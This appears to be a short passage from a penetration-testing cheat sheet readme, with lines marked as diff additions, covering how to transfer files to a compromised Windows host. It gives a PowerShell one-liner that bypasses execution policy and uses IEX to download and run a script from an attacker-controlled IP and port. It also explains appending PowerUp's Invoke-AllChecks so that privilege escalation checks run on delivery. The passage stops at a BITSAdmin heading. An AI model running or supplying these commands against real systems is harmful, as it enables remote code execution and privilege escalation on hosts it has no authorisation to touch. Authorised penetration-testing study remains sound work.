curtishoughton/Penetration-Testing-Cheat-Sheet/File-Transfer/readme.md

 `powershell -Version 2 -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString('http://<IPAddress>:<Port>/PowershellScript.ps1')`

+To execute the payload upon delivery add the command you want Powershell to run at the end of the script.
+A good example of this is using the PowerUp.ps1 privilege escalation script.
+The command Invoke-AllChecks can be added to the end of the script so that it is ran as soon as it is collected from the attackers machine.
+If you only want to download the script then execute later the `powershell Import-Module .\PowershellScript.ps1` command can be used.
+This will then allow you to run the commands within the script manaully.

 ### BITS Admin

 BITSAdmin can also be used to transfer files to a host with the following command: